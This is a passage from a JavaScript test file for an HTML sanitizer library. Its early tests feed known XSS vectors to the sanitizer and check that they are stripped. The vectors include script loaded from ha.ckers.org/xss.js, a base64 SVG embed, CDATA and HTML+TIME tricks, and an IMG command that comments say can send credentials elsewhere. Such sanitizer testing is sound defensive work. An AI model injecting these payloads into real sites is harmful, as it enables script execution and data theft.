  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
690
  safeHtml = '';
691
  xssHtml = '<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH' +
692
      ' A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv Mj' +
693
      'AwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB' +
694
      '2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBp' +
695
      'ZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpO' +
696
      'zwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" ' +
697
      'AllowScriptAccess="always"></EMBED>';
698
  assertSanitizedHtml(xssHtml, safeHtml);
699

700
  // XML namespace. The htc file must be located on the same server as your XSS
701
  // vector:
702
  // Browser support: [IE7.0|IE6.0|NS8.1-IE]
703
  safeHtml = '<span>XSS</span>';
704
  xssHtml = '<HTML xmlns:xss>' +
705
      '<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">' +
706
      '<xss:xss>XSS</xss:xss>' +
707
      '</HTML>';
708
  assertSanitizedHtml(xssHtml, safeHtml);
709

710
  // XML data island with CDATA obfuscation (this XSS attack works only in IE
711
  // and Netscape 8.1 in IE rendering engine mode) - vector found by Sec Consult
712
  // while auditing Yahoo:
713
  // Browser support: [IE6.0|NS8.1-IE]
714
  safeHtml = isIE9() ? '<span><span></span></span>' :
715
                       '<span><span><span>]]&gt;</span></span></span>' +
716
          '<span></span>';
717
  xssHtml = '<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]>' +
718
      '<![CDATA[cript:xss=true;">]]>' +
719
      '</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>';
720
  assertSanitizedHtml(xssHtml, safeHtml);
721

722
  // HTML+TIME in XML. This is how Grey Magic hacked Hotmail and Yahoo!. This
723
  // only works in Internet Explorer and Netscape 8.1 in IE rendering engine
724
  // mode and remember that you need to be between HTML and BODY tags for this
725
  // to work:
726
  // Browser support: [IE7.0|IE6.0|NS8.1-IE]
727
  safeHtml = '<span></span>';
728
  xssHtml = '<HTML><BODY>' +
729
      '<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">' +
730
      '<?import namespace="t" implementation="#default#time2">' +
731
      '<t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;' +
732
      'alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">' +
733
      '</BODY></HTML>';
734
  assertSanitizedHtml(xssHtml, safeHtml);
735

736
  // IMG Embedded commands - this works when the webpage where this is injected
737
  // (like a web-board) is behind password protection and that password
738
  // protection works with other commands on the same domain. This can be used
739
  // to delete users, add users (if the user who visits the page is an
740
  // administrator), send credentials elsewhere, etc.... This is one of the
741
  // lesser used but more useful XSS vectors:
742
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
743
  safeHtml = '<img />';
744
  xssHtml = '<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?' +
745
      'somevariables=maliciouscode">';
746
  assertSanitizedHtml(xssHtml, safeHtml);
747

748
  // This was tested in IE, your mileage may vary. For performing XSS on sites
749
  // that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of a regex
750
  // filter "/<script[^>]+src/i":
751
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
752
  safeHtml = '';
753
  xssHtml = '<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"><\/SCRIPT>';
754
  assertSanitizedHtml(xssHtml, safeHtml);
755

756
  safeHtml = '';
757
  xssHtml = '<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"><\/SCRIPT>';
758
  assertSanitizedHtml(xssHtml, safeHtml);
759

760
  // This XSS still worries me, as it would be nearly impossible to stop this
761
  // without blocking all active content:
762
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
763
  safeHtml = 'PT SRC="http://ha.ckers.org/xss.js"&gt;';
764
  xssHtml = '<SCRIPT>document.write("<SCRI");<\/SCRIPT>PT ' +
765
      'SRC="http://ha.ckers.org/xss.js"><\/SCRIPT>';
766
  assertSanitizedHtml(xssHtml, safeHtml);
767

768
  // US-ASCII encoding (found by Kurt Huwig). This uses malformed ASCII encoding
769
  // with 7 bits instead of 8. This XSS may bypass many content filters but
770
  // only works if the host transmits in US-ASCII encoding, or if you set the
771
  // encoding yourself. This is more useful against web application firewall
772
  // cross site scripting evasion than it is server side filter evasion. Apache
773
  // Tomcat is the only known server that transmits in US-ASCII encoding. I
774
  // highly suggest anyone interested in alternate encoding issues look at my
775
  // charsets issues page:
776
  // Browser support: [IE7.0|IE6.0|NS8.1-IE]
777
  // NOTE(danesh): We'd sanitize this if we received the (mis-)appropriately
778
  // encoded version of this.
779
  // safeHtml = ' script alert( XSS ) /script ';
780
  // xssHtml = '¼script¾alert(¢XSS¢)¼/script¾';
781
  // assertSanitizedHtml(xssHtml, safeHtml);
782

783
  // Escaping JavaScript escapes. When the application is written to output some
784
  // user information inside of a JavaScript like the following:
785
  // <SCRIPT>var a="$ENV{QUERY_STRING}";<\/SCRIPT> and you want to inject your
786
  // own JavaScript into it but the server side application escapes certain
787
  // quotes you can circumvent that by escaping their escape character. When
788
  // this is gets injected it will read
789
  // <SCRIPT>var a="\\";alert('XSS');//";<\/SCRIPT> which ends up un-escaping
790
  // the double quote and causing the Cross Site Scripting vector to fire.
791
  // The XSS locator uses this method.:
792
  // Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0]
793
  // NOTE(danesh): We expect this to fail. More of a JS sanitizer check or a
794
  // server-side template vulnerability test.
795
  // safeHtml = '';
796
  // xssHtml = '\";alert(window);//';
797
  // assertSanitizedHtml(xssHtml, safeHtml);
798
}
799

800

801
function testDataAttributes() {
802
  var html = '<div data-xyz="test">Testing</div>';
803
  var safeHtml = '<div>Testing</div>';
804
  assertSanitizedHtml(html, safeHtml);
805

806
  html = '<div data-goomoji="test" data-other="xyz">Testing</div>';
807
  var expectedHtml = '<div data-goomoji="test">Testing</div>';
808
  assertSanitizedHtml(
809
      html, expectedHtml, new goog.html.sanitizer.HtmlSanitizer.Builder()
810
                              .allowCssStyles()
811
                              .allowDataAttributes(['data-goomoji'])
812
                              .build());
813
}
814

815

816
function testDisallowedDataWhitelistingAttributes() {
817
  assertThrows(function() {
818
    new goog.html.sanitizer.HtmlSanitizer.Builder()
819
        .allowDataAttributes(['datai'])
820
        .build();
821
  });
822

823
  // Disallow internal attribute used by html sanitizer
824
  assertThrows(function() {
825
    new goog.html.sanitizer.HtmlSanitizer.Builder()
826
        .allowDataAttributes(['data-i', 'data-sanitizer-safe'])
827
        .build();
828
  });
829
}
830

831

832
function testFormBody() {
833
  var safeHtml = '<form>stuff</form>';
834
  var formHtml = '<form name="body">stuff</form>';
835
  assertSanitizedHtml(
836
      formHtml, safeHtml,
837
      new goog.html.sanitizer.HtmlSanitizer.Builder().allowFormTag().build());
838
}
839

840

841
function testStyleTag() {
842
  var safeHtml = '';
843
  var xssHtml = '<STYLE>P.special {color : green;border: solid red;}</STYLE>';
844
  assertSanitizedHtml(xssHtml, safeHtml);
845
}
846

847

848
function testOnlyAllowTags() {
849
  var result = '<div><span></span>' +
850
      '<a href="http://www.google.com">hi</a>' +
851
      '<br>Test.<span></span><div align="right">Test</div></div>';
852
  // If we were mimicing goog.labs.html.sanitizer, our output would be
853
  // '<div><a>hi</a><br>Test.<div>Test</div></div>';
854
  assertSanitizedHtml(
855
      '<div><img id="bar" name=foo class="c d" ' +
856
          'src="http://wherever.com">' +
857
          '<a href=" http://www.google.com">hi</a>' +
858
          '<br>Test.<hr><div align="right">Test</div></div>',
859
      result, new goog.html.sanitizer.HtmlSanitizer.Builder()
860
                  .onlyAllowTags(['bR', 'a', 'DIV'])
861
                  .build());
862
}
863

864

865
function testDisallowNonWhitelistedTags() {
866
  assertThrows('Should error on elements not whitelisted', function() {
867
    new goog.html.sanitizer.HtmlSanitizer.Builder().onlyAllowTags(['x']);
868
  });
869
}
870

871

872
function testDefaultPoliciesAreApplied() {
873
  var result = '<img /><a href="http://www.google.com">hi</a>' +
874
      '<a href="ftp://whatever.com">another</a>';
875
  assertSanitizedHtml(
876
      '<img id="bar" name=foo class="c d" ' +
877
          'src="http://wherever.com">' +
878
          '<a href=" http://www.google.com">hi</a>' +
879
          '<a href=ftp://whatever.com>another</a>',
880
      result);
881
}
882

883

884
function testCustomNamePolicyIsApplied() {
885
  var result = '<img name="myOwnPrefix-foo" />' +
886
      '<a href="http://www.google.com">hi</a>' +
887
      '<a href="ftp://whatever.com">another</a>';
888
  assertSanitizedHtml(
889
      '<img id="bar" name=foo class="c d" ' +
890
          'src="http://wherever.com"><a href=" http://www.google.com">hi</a>' +
891
          '<a href=ftp://whatever.com>another</a>',
892
      result, new goog.html.sanitizer.HtmlSanitizer.Builder()
893
                  .withCustomNamePolicy(function(name) {
894
                    return 'myOwnPrefix-' + name;
895
                  })
896
                  .build());
897
}
898

899

900
function testCustomTokenPolicyIsApplied() {
901
  var result = '<img id="myOwnPrefix-bar" ' +
902
      'class="myOwnPrefix-c myOwnPrefix-d" />' +
903
      '<a href="http://www.google.com">hi</a>' +
904
      '<a href="ftp://whatever.com">another</a>';
905
  assertSanitizedHtml(
906
      '<img id="bar" name=foo class="c d" ' +
907
          'src="http://wherever.com"><a href=" http://www.google.com">hi</a>' +
908
          '<a href=ftp://whatever.com>another</a>',
909
      result, new goog.html.sanitizer.HtmlSanitizer.Builder()
910
                  .withCustomTokenPolicy(function(name) {
911
                    return 'myOwnPrefix-' + name;
912
                  })
913
                  .build());
914
}
915

916

917
function testMultipleCustomPoliciesAreApplied() {
918
  var result = '<img id="plarpalarp-bar" name="larlarlar-foo" ' +
919
      'class="plarpalarp-c plarpalarp-d" />' +
920
      '<a href="http://www.google.com">hi</a>' +
921
      '<a href="ftp://whatever.com">another</a>';
922
  assertSanitizedHtml(
923
      '<img id="bar" name=foo class="c d" ' +
924
          'src="http://wherever.com"><a href=" http://www.google.com">hi</a>' +
925
          '<a href=ftp://whatever.com>another</a>',
926
      result,
927
      new goog.html.sanitizer.HtmlSanitizer.Builder()
928
          .withCustomTokenPolicy(function(token) {
929
            return 'plarpalarp-' + token;
930
          })
931
          .withCustomNamePolicy(function(name) { return 'larlarlar-' + name; })
932
          .build());
933
}
934

935

936
function testNonTrivialCustomPolicy() {
937
  var result = '<img /><a href="http://www.google.com" name="Alacrity">hi</a>' +
938
      '<a href="ftp://whatever.com">another</a>';
939
  assertSanitizedHtml(
940
      '<img id="bar" name=foo class="c d" src="http://wherever.com">' +
941
          '<a href=" http://www.google.com" name=Alacrity>hi</a>' +
942
          '<a href=ftp://whatever.com>another</a>',
943
      result,
944
      new goog.html.sanitizer.HtmlSanitizer.Builder()
945
          .withCustomNamePolicy(function testNamesMustBeginWithTheLetterA(
946
              name) { return name.charAt(0) != 'A' ? null : name; })
947
          .build());
948
}
949

950

951
function testNetworkRequestUrlsAllowed() {
952
  var result = '<img src="http://wherever.com" />' +
953
      '<img src="https://secure.wherever.com" />' +
954
      '<img alt="test" src="//wherever.com" />' +
955
      '<a href="http://www.google.com">hi</a>' +
956
      '<a href="ftp://whatever.com">another</a>';
957
  assertSanitizedHtml(
958
      '<img id="bar" name=foo class="c d" src="http://wherever.com">' +
959
          '<img src="https://secure.wherever.com">' +
960
          '<img alt="test" src="//wherever.com">' +
961
          '<a href=" http://www.google.com">hi</a>' +
962
          '<a href=ftp://whatever.com>another</a>',
963
      result, new goog.html.sanitizer.HtmlSanitizer.Builder()
964
                  .withCustomNetworkRequestUrlPolicy(goog.html.SafeUrl.sanitize)
965
                  .build());
966
}
967

968

969
function testCustomNRUrlPolicyMustNotContainParameters() {
970
  var result = '<img src="http://wherever.com" /><img />';
971
  assertSanitizedHtml(
972
      '<img id="bar" class="c d" src="http://wherever.com">' +
973
          '<img src="https://www.bank.com/withdraw?amount=onebeeeelion">',
974
      result, new goog.html.sanitizer.HtmlSanitizer.Builder()
975
                  .withCustomNetworkRequestUrlPolicy(function(url) {
976
                    return url.match(/\?/) ? null :
977
                        goog.html.testing.newSafeUrlForTest(url);
978
                  })
979
                  .build());
980
}
981

982

983
function testPolicyHints() {
984
  var sanitizer =
985
      new goog.html.sanitizer.HtmlSanitizer.Builder()
986
          .allowFormTag()
987
          .withCustomNetworkRequestUrlPolicy(function(url, policyHints) {
988
            if ((policyHints.tagName == 'img' &&
989
                 policyHints.attributeName == 'src') ||
990
                (policyHints.tagName == 'input' &&
991
                 policyHints.attributeName == 'src')) {
992
              return goog.html.testing.newSafeUrlForTest(
993
                  'https://imageproxy/?' + url);
994
            } else {
995
              return null;
996
            }
997
          })
998
          .withCustomUrlPolicy(function(url, policyHints) {
999
            if (policyHints.tagName == 'a' &&
1000
                policyHints.attributeName == 'href') {
1001
              return goog.html.testing.newSafeUrlForTest(
1002
                  'https://linkproxy/?' + url);
1003
            }
1004
            return goog.html.SafeUrl.sanitize(url);
1005
          })
1006
          .build();
1007

1008
  // TODO(user): update this test to include a stylesheet once they're
1009
  //   supported (in order to view both branches of the NRUrlPolicy).
1010
  var result = '<img src="https://imageproxy/?http://image" /> ' +
1011
      '<input type="image" src="https://imageproxy/?http://another" />' +
1012
      '<a href="https://linkproxy/?http://link">a link</a>' +
1013
      '<form action="http://formaction"></form>';
1014
  assertSanitizedHtml(
1015
      '<img src="http://image"> <input type="image" ' +
1016
          'src="http://another"><a href="http://link">a link</a>' +
1017
          '<form action="http://formaction"></form>',
1018
      result, sanitizer);
1019
}
1020

1021

1022
function testNRUrlPolicyAffectsCssSanitization() {
1023
  var sanitizer =
1024
      new goog.html.sanitizer.HtmlSanitizer.Builder()
1025
          .allowCssStyles()
1026
          .withCustomNetworkRequestUrlPolicy(function(url, policyHints) {
1027
            // Network request URLs may only be over https.
1028
            if (!/^https:\/\//i.test(url)) {
1029
              return null;
1030
            }
1031
            // CSS background URLs may only come from google.com.
1032
            if (policyHints.cssProperty === 'background-image') {
1033
              if (!/^https:\/\/www\.google\.com\//i.test(url)) {
1034
                return null;
1035
              }
1036
            }
1037
            return goog.html.SafeUrl.sanitize(url);
1038
          })
1039
          .build();
1040

1041
  var sanitizedHtml;
1042
  try {
1043
    sanitizedHtml = sanitizer.sanitize(
1044
        '<div style="background: url(\'https://www.google.com/i.png\')"></div>');
1045
    if (isIE9()) {
1046
      assertEquals('', goog.html.SafeHtml.unwrap(sanitizedHtml));
1047
      return;
1048
    }
1049
    assertRegExp(
1050
        /background(?:-image)?:.*url\(.?https:\/\/www.google.com\/i.png.?\)/,
1051
        getStyle(sanitizedHtml));
1052
  } catch (err) {
1053
    if (!isIE8()) {
1054
      throw err;
1055
    }
1056
  }
1057

1058
  try {
1059
    sanitizedHtml = sanitizer.sanitize(
1060
        '<div style="background: url(\'https://wherever/\')"></div>');
1061
    assertNotContains(
1062
        'https://wherever/', goog.html.SafeHtml.unwrap(sanitizedHtml));
1063
  } catch (err) {
1064
    if (!isIE8()) {
1065
      throw err;
1066
    }
1067
  }
1068

1069
  sanitizedHtml = '<img src="https://www.google.com/i.png">';
1070
  assertSanitizedHtml(sanitizedHtml, sanitizedHtml, sanitizer);
1071

1072
  sanitizedHtml = '<img src="https://wherever/">';
1073
  assertSanitizedHtml(sanitizedHtml, sanitizedHtml, sanitizer);
1074
}
1075

1076

1077
function testAllowOnlyHttpAndHttpsAndFtpForNRUP() {
1078
  var input = '<img src="http://whatever">' +
1079
      '<img src="https://whatever">' +
1080
      '<img src="ftp://nope">' +
1081
      '<img src="garbage:nope">' +
1082
      '<img src="data:yep">';
1083
  var expected = '<img src="http://whatever" />' +
1084
      '<img src="https://whatever" />' +
1085
      '<img src="ftp://nope">' +
1086
      '<img />' +
1087
      '<img />';
1088
  assertSanitizedHtml(
1089
      input, expected,
1090
      new goog.html.sanitizer.HtmlSanitizer.Builder()
1091
          .withCustomNetworkRequestUrlPolicy(goog.html.SafeUrl.sanitize)
1092
          .build());
1093
}
1094

1095

1096
function testUriSchemesOnNonNetworkRequestUrls() {
1097
  var input = '<a href="ftp://yep">something</a>' +
1098
      '<a href="gopher://yep">something</a>' +
1099
      '<a href="gopher:nope">something</a>' +
1100
      '<a href="http://yep">something</a>' +
1101
      '<a href="https://yep">something</a>' +
1102
      '<a href="garbage://nope">something</a>' +
1103
      '<a href="relative/yup">something</a>' +
1104
      '<a href="nope">something</a>' +
1105
      '<a>lol</a>';
1106
  var expected = '<a href="ftp://yep">something</a>' +
1107
      '<a>something</a>' +
1108
      '<a>something</a>' +
1109
      '<a href="http://yep">something</a>' +
1110
      '<a href="https://yep">something</a>' +
1111
      '<a>something</a>' +
1112
      '<a href="relative/yup">something</a>' +
1113
      '<a href="nope">something</a>' +
1114
      '<a>lol</a>';
1115
  assertSanitizedHtml(
1116
      input, expected, new goog.html.sanitizer.HtmlSanitizer.Builder()
1117
                           .withCustomUrlPolicy(goog.html.SafeUrl.sanitize)
1118
                           .build());
1119
}
1120

1121

1122
function testOverridingGetOrSetAttribute() {
1123
  var input = '<form>' +
1124
      '<input name=setAttribute />' +
1125
      '<input name=getAttribute />' +
1126
      '</form>';
1127
  var expected = '<form><input><input></form>';
1128
  assertSanitizedHtml(
1129
      input, expected,
1130
      new goog.html.sanitizer.HtmlSanitizer.Builder().allowFormTag().build());
1131
}
1132

1133

1134
function testOverridingBookkeepingAttribute() {
1135
  var input = '<div data-sanitizer-foo="1" alt="b">Hello</div>';
1136
  var expected = '<div alt="b">Hello</div>';
1137
  assertSanitizedHtml(
1138
      input, expected,
1139
      new goog.html.sanitizer.HtmlSanitizer.Builder()
1140
          .withCustomTokenPolicy(function(token) { return token; })
1141
          .build());
1142
}
1143

1144

1145
function testTemplateRemoved() {
1146
  var input = '<div><template><h1>boo</h1></template></div>';
1147
  var expected = '<div></div>';
1148
  assertSanitizedHtml(input, expected);
1149
}
1150

1151

1152
/**
1153
 * Shorthand for sanitized tags
1154
 * @param {string} tag
1155
 * @return {string}
1156
 */
1157
function otag(tag) {
1158
  return 'data-sanitizer-original-tag="' + tag + '"';
1159
}
1160

1161

1162
function testOriginalTag() {
1163
  var input = '<p>Line1<magic></magic></p>';
1164
  var expected = '<p>Line1<span ' + otag('magic') + '></span></p>';
1165
  assertSanitizedHtml(
1166
      input, expected, new goog.html.sanitizer.HtmlSanitizer.Builder()
1167
                           .addOriginalTagNames()
1168
                           .build());
1169
}
1170

1171

1172
function testOriginalTagOverwrite() {
1173
  var input = '<div id="qqq">hello' +
1174
      '<a:b id="hi" class="hnn a" boo="3">qqq</a:b></div>';
1175
  var expected = '<div>hello<span ' + otag('a:b') + ' id="HI" class="hnn a">' +
1176
      'qqq</span></div>';
1177
  assertSanitizedHtml(
1178
      input, expected, new goog.html.sanitizer.HtmlSanitizer.Builder()
1179
                           .addOriginalTagNames()
1180
                           .withCustomTokenPolicy(function(token, hints) {
1181
                             var an = hints.attributeName;
1182
                             if (an === 'id' && token === 'hi') {
1183
                               return 'HI';
1184
                             } else if (an === 'class') {
1185
                               return token;
1186
                             }
1187
                             return null;
1188
                           })
1189
                           .build());
1190
}
1191

1192

1193
function testOriginalTagClobber() {
1194
  var input = '<a:b data-sanitizer-original-tag="xss"></a:b>';
1195
  var expected = '<span ' + otag('a:b') + '></span>';
1196
  assertSanitizedHtml(
1197
      input, expected, new goog.html.sanitizer.HtmlSanitizer.Builder()
1198
                           .addOriginalTagNames()
1199
                           .build());
1200
}
1201

1202

1203
// the tests below investigate how <span> behaves when it is unknowingly put
1204
// as child or parent of other elements due to sanitization. <div> had even more
1205
// problems (e.g. cannot be a child of <p>)
1206

1207

1208
/**
1209
 * Sanitize content, let the browser apply its own HTML tree correction by
1210
 * attaching the content to the document, and then assert it matches the
1211
 * expected value.
1212
 * @param {string} expected
1213
 * @param {string} input
1214
 */
1215
function assertAfterInsertionEquals(expected, input) {
1216
  var sanitizer =
1217
      new goog.html.sanitizer.HtmlSanitizer.Builder().allowFormTag().build();
1218
  input = goog.html.SafeHtml.unwrap(sanitizer.sanitize(input));
1219
  var div = document.createElement('div');
1220
  document.body.appendChild(div);
1221
  div.innerHTML = input;
1222
  goog.testing.dom.assertHtmlMatches(
1223
      expected, div.innerHTML, true /* opt_strictAttributes */);
1224
  div.parentNode.removeChild(div);
1225
}
1226

1227

1228
function testSpanNotCorrectedByBrowsersOuter() {
1229
  if (isIE8() || isIE9()) {
1230
    return;
1231
  }
1232
  goog.array.forEach(
1233
      goog.object.getKeys(goog.html.sanitizer.TagWhitelist), function(tag) {
1234
        if (goog.array.contains(
1235
                [
1236
                  'BR', 'IMG', 'AREA', 'COL', 'COLGROUP', 'HR', 'INPUT',
1237
                  'SOURCE', 'WBR'
1238
                ],
1239
                tag)) {
1240
          return;  // empty elements, ok
1241
        }
1242
        if (goog.array.contains(['CAPTION'], tag)) {
1243
          return;  // potential problems
1244
        }
1245
        if (goog.array.contains(['NOSCRIPT'], tag)) {
1246
          return;  // weird/not important
1247
        }
1248
        if (goog.array.contains(
1249
                [
1250
                  'SELECT', 'TABLE', 'TBODY', 'TD', 'TR', 'TEXTAREA', 'TFOOT',
1251
                  'THEAD', 'TH'
1252
                ],
1253
                tag)) {
1254
          return;  // consistent in whitelist, ok
1255
        }
1256
        var input = '<' + tag.toLowerCase() + '>a<span></span>a</' +
1257
            tag.toLowerCase() + '>';
1258
        assertAfterInsertionEquals(input, input);
1259
      });
1260
}
1261

1262

1263
function testSpanNotCorrectedByBrowsersInner() {
1264
  if (isIE8() || isIE9()) {
1265
    return;
1266
  }
1267
  goog.array.forEach(
1268
      goog.object.getKeys(goog.html.sanitizer.TagWhitelist), function(tag) {
1269
        if (goog.array.contains(
1270
                [
1271
                  'CAPTION', 'TABLE', 'TBODY', 'TD', 'TR', 'TEXTAREA', 'TFOOT',
1272
                  'THEAD', 'TH'
1273
                ],
1274
                tag)) {
1275
          return;  // consistent in whitelist, ok
1276
        }
1277
        if (goog.array.contains(['COL', 'COLGROUP'], tag)) {
1278
          return;  // potential problems
1279
        }
1280
        // TODO(pelizzi): Skip testing for FORM tags on Chrome until b/32550695
1281
        // is fixed.
1282
        if (tag == 'FORM' && goog.userAgent.WEBKIT) {
1283
          return;
1284
        }
1285
        var input;
1286
        if (goog.array.contains(
1287
                [
1288
                  'BR', 'IMG', 'AREA', 'COL', 'COLGROUP', 'HR', 'INPUT',
1289
                  'SOURCE', 'WBR'  // empty elements, ok
1290
                ],
1291
                tag)) {
1292
          input = '<span>a<' + tag.toLowerCase() + '>a</span>';
1293
        } else {
1294
          input = '<span>a<' + tag.toLowerCase() + '>a</' + tag.toLowerCase() +
1295
              '>a</span>';
1296
        }
1297
        assertAfterInsertionEquals(input, input);
1298
      });
1299
}
1300

1301

1302
function testTemplateTagToSpan() {
1303
  var input = '<template alt="yes"><p>q</p></template>';
1304
  var expected = '<span alt="yes"><p>q</p></span>';
1305
  // TODO(pelizzi): use unblockTag once it's available
1306
  delete goog.html.sanitizer.TagBlacklist['TEMPLATE'];
1307
  assertSanitizedHtml(input, expected);
1308
  goog.html.sanitizer.TagBlacklist['TEMPLATE'] = true;
1309
}
1310

1311

1312
var just = goog.string.Const.from('test');
1313

1314

1315
function testTemplateTagWhitelisted() {
1316
  var input = '<div><template alt="yes"><p>q</p></template></div>';
1317
  // TODO(pelizzi): use unblockTag once it's available
1318
  delete goog.html.sanitizer.TagBlacklist['TEMPLATE'];
1319
  var builder = new goog.html.sanitizer.HtmlSanitizer.Builder();
1320
  goog.html.sanitizer.unsafe.alsoAllowTags(just, builder, ['TEMPLATE']);
1321
  assertSanitizedHtml(input, input, builder.build());
1322
  goog.html.sanitizer.TagBlacklist['TEMPLATE'] = true;
1323
}
1324

1325

1326
function testTemplateTagFake() {
1327
  var input = '<template data-sanitizer-original-tag="template">a</template>';
1328
  var expected = '';
1329
  assertSanitizedHtml(input, expected);
1330
}
1331

1332

1333
function testTemplateNested() {
1334
  var input = '<template><p>a</p><zzz alt="a"/><script>z</script><template>' +
1335
      '<p>a</p><zzz alt="a"/><script>z</script></template></template>';
1336
  var expected = '<template><p>a</p><span alt="a"></span><template>' +
1337
      '<p>a</p><span alt="a"></span></template></template>';
1338
  // TODO(pelizzi): use unblockTag once it's available
1339
  delete goog.html.sanitizer.TagBlacklist['TEMPLATE'];
1340
  var builder = new goog.html.sanitizer.HtmlSanitizer.Builder();
1341
  goog.html.sanitizer.unsafe.alsoAllowTags(just, builder, ['TEMPLATE']);
1342
  assertSanitizedHtml(input, expected, builder.build());
1343
  goog.html.sanitizer.TagBlacklist['TEMPLATE'] = true;
1344
}
1345

1346

1347
function testOnlyAllowEmptyAttrList() {
1348
  var input = '<p alt="nope" aria-checked="true" zzz="1">b</p>' +
1349
      '<a target="_blank">c</a>';
1350
  var expected = '<p>b</p><a>c</a>';
1351
  assertSanitizedHtml(
1352
      input, expected, new goog.html.sanitizer.HtmlSanitizer.Builder()
1353
                           .onlyAllowAttributes([])
1354
                           .build());
1355
}
1356

1357

1358
function testOnlyAllowUnWhitelistedAttr() {
1359
  assertThrows(function() {
1360
    new goog.html.sanitizer.HtmlSanitizer.Builder().onlyAllowAttributes(
1361
        ['alt', 'zzz']);
1362
  });
1363
}
1364

1365

1366
function testOnlyAllowAttributeWildCard() {
1367
  var input =
1368
      '<div alt="yes" aria-checked="true"><img alt="yep" avbb="no" /></div>';
1369
  var expected = '<div alt="yes"><img alt="yep" /></div>';
1370
  assertSanitizedHtml(
1371
      input, expected,
1372
      new goog.html.sanitizer.HtmlSanitizer.Builder()
1373
          .onlyAllowAttributes([{tagName: '*', attributeName: 'alt'}])
1374
          .build());
1375
}
1376

1377

1378
function testOnlyAllowAttributeLabelForA() {
1379
  var input = '<a label="3" aria-checked="4">fff</a><img label="3" />';
1380
  var expected = '<a label="3">fff</a><img />';
1381
  assertSanitizedHtml(
1382
      input, expected, new goog.html.sanitizer.HtmlSanitizer.Builder()
1383
                           .onlyAllowAttributes([{
1384
                             tagName: '*',
1385
                             attributeName: 'label',
1386
                             policy: function(value, hints) {
1387
                               if (hints.tagName !== 'a') {
1388
                                 return null;
1389
                               }
1390
                               return value;
1391
                             }
1392
                           }])
1393
                           .build());
1394
}
1395

1396

1397
function testOnlyAllowAttributePolicy() {
1398
  var input = '<img alt="yes" /><img alt="no" />';
1399
  var expected = '<img alt="yes" /><img />';
1400
  assertSanitizedHtml(
1401
      input, expected, new goog.html.sanitizer.HtmlSanitizer.Builder()
1402
                           .onlyAllowAttributes([{
1403
                             tagName: '*',
1404
                             attributeName: 'alt',
1405
                             policy: function(value, hints) {
1406
                               assertEquals(hints.attributeName, 'alt');
1407
                               return value === 'yes' ? value : null;
1408
                             }
1409
                           }])
1410
                           .build());
1411
}
1412

1413

1414
function testOnlyAllowAttributePolicyPipe1() {
1415
  var input = '<a target="hello">b</a>';
1416
  var expected = '<a target="_blank">b</a>';
1417
  assertSanitizedHtml(
1418
      input, expected, new goog.html.sanitizer.HtmlSanitizer.Builder()
1419
                           .onlyAllowAttributes([{
1420
                             tagName: 'a',
1421
                             attributeName: 'target',
1422
                             policy: function(value, hints) {
1423
                               assertEquals(hints.attributeName, 'target');
1424
                               return '_blank';
1425
                             }
1426
                           }])
1427
                           .build());
1428
}
1429

1430

1431
function testOnlyAllowAttributePolicyPipe2() {
1432
  var input = '<a target="hello">b</a>';
1433
  var expected = '<a>b</a>';
1434
  assertSanitizedHtml(
1435
      input, expected, new goog.html.sanitizer.HtmlSanitizer.Builder()
1436
                           .onlyAllowAttributes([{
1437
                             tagName: 'a',
1438
                             attributeName: 'target',
1439
                             policy: function(value, hints) {
1440
                               assertEquals(hints.attributeName, 'target');
1441
                               return 'nope';
1442
                             }
1443
                           }])
1444
                           .build());
1445
}
1446

1447

1448
function testOnlyAllowAttributeSpecificPolicyThrows() {
1449
  assertThrows(function() {
1450
    new goog.html.sanitizer.HtmlSanitizer.Builder().onlyAllowAttributes([
1451
      {tagName: 'img', attributeName: 'src', policy: goog.functions.identity}
1452
    ]);
1453
  });
1454
}
1455

1456

1457
function testOnlyAllowAttributeGenericPolicyThrows() {
1458
  assertThrows(function() {
1459
    new goog.html.sanitizer.HtmlSanitizer.Builder().onlyAllowAttributes([{
1460
      tagName: '*',
1461
      attributeName: 'target',
1462
      policy: goog.functions.identity
1463
    }]);
1464
  });
1465
}
1466

1467

1468
function testOnlyAllowAttributeRefineThrows() {
1469
  var builder =
1470
      new goog.html.sanitizer.HtmlSanitizer.Builder()
1471
          .onlyAllowAttributes(
1472
              ['aria-checked', {tagName: 'LINK', attributeName: 'HREF'}])
1473
          .onlyAllowAttributes(['aria-checked']);
1474
  assertThrows(function() {
1475
    builder.onlyAllowAttributes(['alt']);
1476
  });
1477
}
1478

1479

1480
function testUrlWithCredentials() {
1481
  if (isIE8() || isIE9()) {
1482
    return;
1483
  }
1484
  // IE has trouble getting and setting URL attributes with credentials. Both
1485
  // HTMLSanitizer and assertHtmlMatches are affected by the bug, hence the use
1486
  // of plain string matching.
1487
  var url = 'http://foo:[email protected]';
1488
  var input = '<div style="background-image: url(\'' + url + '\');">' +
1489
      '<img src="' + url + '" /></div>';
1490
  var expectedIE = '<div style="background-image: url(&quot;' + url +
1491
      '&quot;);"><img src="' + url + '" /></div>';
1492
  var sanitizer =
1493
